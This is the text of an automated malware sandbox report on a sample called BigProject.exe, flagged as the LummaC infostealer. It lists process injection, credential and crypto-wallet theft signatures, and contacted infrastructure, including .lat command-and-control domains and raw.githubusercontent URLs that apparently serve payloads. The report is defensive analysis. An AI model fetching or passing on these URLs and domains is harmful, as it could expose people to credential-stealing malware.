behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579291 Sample: BigProject.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 23 stem-mellows.cyou 2->23 25 x1.i.lencr.org 2->25 27 3 other IPs or domains 2->27 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 9 BigProject.exe 3 15 2->9         started        signatures3 process4 dnsIp5 29 raw.githubusercontent.com 185.199.110.133, 443, 49704, 49705 FASTLYUS Netherlands 9->29 41 Writes to foreign memory regions 9->41 43 Allocates memory in foreign processes 9->43 45 Injects a PE file into a foreign processes 9->45 47 LummaC encrypted strings found 9->47 13 CasPol.exe 9->13         started        17 Acrobat.exe 61 9->17         started        signatures6 process7 dnsIp8 31 discokeyus.lat 172.67.197.170, 443, 49709, 49715 CLOUDFLARENETUS United States 13->31 49 Query firmware table information (likely to detect VMs) 13->49 51 Found many strings related to Crypto-Wallets (likely being stolen) 13->51 53 Tries to harvest and steal ftp login credentials 13->53 55 2 other signatures 13->55 19 AcroCEF.exe 106 17->19         started        signatures9 process10 process11 21 AcroCEF.exe 4 19->21         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.199.110.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
172.67.197.170
 discokeyus.lat United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
raw.githubusercontent.com 185.199.110.133 true
discokeyus.lat 172.67.197.170 true
x1.i.lencr.org unknown unknown
grannyejh.lat unknown unknown
stem-mellows.cyou unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
necklacebudi.lat false
    		high
    https://discokeyus.lat/api false
      		high
      aspecteirs.lat false
        		high
        energyaffai.lat false
          		high
          sustainskelet.lat false
            		high
            crosshuaht.lat false
              		high
              rapeflowwj.lat false
                		high
                grannyejh.lat false
                  		high
                  discokeyus.lat false
                    		high
                    https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion false
                      		high
                      https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf false
                        		high
                        stem-mellows.cyou true
                          		unknown